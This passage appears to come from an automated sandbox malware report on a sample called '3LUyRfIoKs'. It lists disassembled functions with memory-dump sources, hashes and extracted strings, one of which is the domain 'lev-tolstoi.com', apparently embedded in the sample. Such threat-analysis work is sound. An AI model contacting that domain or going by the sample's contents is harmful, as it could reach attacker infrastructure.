                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                • String ID: +Ku$wpq
                                                                                                                                                                                                                                                • API String ID: 237503144-1953850642
                                                                                                                                                                                                                                                • Opcode ID: 6906a31b43a14f498591294e05eceb3073014447cf2d45ed2ad5f3d78badd640
                                                                                                                                                                                                                                                • Instruction ID: 62002a96540e5c2ef7762b1bcb46ada53a2eac0db246e36784d9122d6973df4b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6906a31b43a14f498591294e05eceb3073014447cf2d45ed2ad5f3d78badd640
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D151BD7221C3518FC324CF69984076FB6E6EBC5310F15892DE4DACB285DB70D50A8B92
                                                                                                                                                                                                                                                Function 00AC90D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 00AC9170
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                • String ID: M/($M/(
                                                                                                                                                                                                                                                • API String ID: 237503144-1710806632
                                                                                                                                                                                                                                                • Opcode ID: 316c47b2f6aef3b36ff97083a33de5176564506875b30cdd6902c7677a1fe8c8
                                                                                                                                                                                                                                                • Instruction ID: 2837162df633710f04bc99d24157f862a758aab17db85e3c774485c64389dc6b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 316c47b2f6aef3b36ff97083a33de5176564506875b30cdd6902c7677a1fe8c8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 70212371A5C3515FE714CE389886B9FF7AAEBC2700F01892CE0D1DB1C5D675880B8756
                                                                                                                                                                                                                                                Function 00ACA5B6 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: VN$VN$i$i
                                                                                                                                                                                                                                                • API String ID: 0-1885346908
                                                                                                                                                                                                                                                • Opcode ID: f2560a5eb87e48c54c403f4c235dd9b7370a68364d9f3f272869781b585ee5e7
                                                                                                                                                                                                                                                • Instruction ID: ad50bda7c22c7417eb680a23af4ee06345df8218d3f0429ef924c1f3edf4d8d5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f2560a5eb87e48c54c403f4c235dd9b7370a68364d9f3f272869781b585ee5e7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7821C6211483898AD3058F7580407B6BBE3ABD671CF29865ED1F15B391EA3BC90A4757
                                                                                                                                                                                                                                                Function 00ACA0CA Relevance: 4.1, Strings: 3, Instructions: 336COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: .txt$<\hX$_^]\
                                                                                                                                                                                                                                                • API String ID: 0-3117400391
                                                                                                                                                                                                                                                • Opcode ID: a07252a179141e236555f882d55a48bf7728eb2b5d3bcf2fbcb93b8011f2dfc8
                                                                                                                                                                                                                                                • Instruction ID: a0028d2b16bf2590f378e084d0e52c534d8dc05fd809cc41356075dc5bc141a7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a07252a179141e236555f882d55a48bf7728eb2b5d3bcf2fbcb93b8011f2dfc8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A7C1107160C384DFD708DF28D891A3EBBE2AFD5314F198A6CF0954B2A2D7359946CB12
                                                                                                                                                                                                                                                Function 00AAD4F3 Relevance: 4.0, Strings: 3, Instructions: 295COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: Fm$V]$lev-tolstoi.com
                                                                                                                                                                                                                                                • API String ID: 0-1622397547
                                                                                                                                                                                                                                                • Opcode ID: 1fab0e534694f7617658631522793866c128aa4ce373efadf030bd837e57d33d
                                                                                                                                                                                                                                                • Instruction ID: 4cffec72a54fef5dd7767ac486b732732c2456e9d3b1011de05034adc3f7ccc9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1fab0e534694f7617658631522793866c128aa4ce373efadf030bd837e57d33d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D91BFB66557818FD325CF29C480656BFA2EF97318729869CC0D64F766C33AA807CB50
                                                                                                                                                                                                                                                Function 00C6113A Relevance: 3.9, Strings: 2, Instructions: 1421COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 2Tev$:?_
                                                                                                                                                                                                                                                • API String ID: 0-3367961955
                                                                                                                                                                                                                                                • Opcode ID: b2541660e373653e7b553114a5284aad0501f381223e2768d1d1da61259bcb9a
                                                                                                                                                                                                                                                • Instruction ID: d51ef8cbb4e182d1006d65abf13137cd658141edf78a50f47cdcffc2a0e26726
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b2541660e373653e7b553114a5284aad0501f381223e2768d1d1da61259bcb9a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C922BF360C2049FE308AE2DEC8577AB7E9EB94320F1A453DE6C5C7744EA3598058697
                                                                                                                                                                                                                                                Function 00ABD003 Relevance: 3.4, Strings: 2, Instructions: 883COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: [V$bh
                                                                                                                                                                                                                                                • API String ID: 0-2174178241
                                                                                                                                                                                                                                                • Opcode ID: e165497e7aac2966f6816d549ac397c419ef4827fb9e140fc932b37e66474b60
                                                                                                                                                                                                                                                • Instruction ID: 746c412717f308ad02c40c6c51e530f27012ebacdcc6bb61957dac8f0257a897
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e165497e7aac2966f6816d549ac397c419ef4827fb9e140fc932b37e66474b60
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0E3215B1911611CBCB24CF28C8926FBB7B1FF95310F18826CD8969B395F735A941CB91
                                                                                                                                                                                                                                                Function 00B77058 Relevance: 3.1, Strings: 2, Instructions: 563COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: A%n$d
                                                                                                                                                                                                                                                • API String ID: 0-2121468217
                                                                                                                                                                                                                                                • Opcode ID: 7f988a82b5294d7a7e25cb5195b27b0bd8aca655c39d29ccdd402a18aa1739a1
                                                                                                                                                                                                                                                • Instruction ID: 40a2c61d1d3e2d8f2ae2567da815559d08b28893766acf63481c060a68795152
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7f988a82b5294d7a7e25cb5195b27b0bd8aca655c39d29ccdd402a18aa1739a1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C112CDF3F156154BF3444D29CD88366BA93EBD4320F2B823D9B98977C9D97D9C0A8284
                                                                                                                                                                                                                                                Function 00B9B1D9 Relevance: 3.0, Strings: 2, Instructions: 514COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: &$G~$+s
                                                                                                                                                                                                                                                • API String ID: 0-2345096911
                                                                                                                                                                                                                                                • Opcode ID: 294e68cd6cae8e07d0e67430c724851adec49ac49b283c6ff080601d6594f7fc
                                                                                                                                                                                                                                                • Instruction ID: 73da378953dfa8ba9c53e049ec51a7cc92dd4d0893807381fc56d258cb37f964
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 294e68cd6cae8e07d0e67430c724851adec49ac49b283c6ff080601d6594f7fc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A5F1F0F3E142254BF3189D39DC98366B692DB94320F2F823D9F89977C5E97E6C064284
                                                                                                                                                                                                                                                Function 00AA4270 Relevance: 2.8, Strings: 2, Instructions: 329COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: )$IEND
                                                                                                                                                                                                                                                • API String ID: 0-707183367
                                                                                                                                                                                                                                                • Opcode ID: 3f88257d034e4e584a53be62d121ff58259b64b3ebfc554dec0628dc0f17bbd1
                                                                                                                                                                                                                                                • Instruction ID: cce041fe163ec6ddd6f9ac0558a8f72b49bafd12fffee8eecea6efb5e3a08091
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f88257d034e4e584a53be62d121ff58259b64b3ebfc554dec0628dc0f17bbd1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 88D16E719083449FD720CF18D845B5FBBE4AB9A304F14492DF9999B3C2D7B5E908CB92
                                                                                                                                                                                                                                                Function 00BA7408 Relevance: 1.8, Strings: 1, Instructions: 514COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
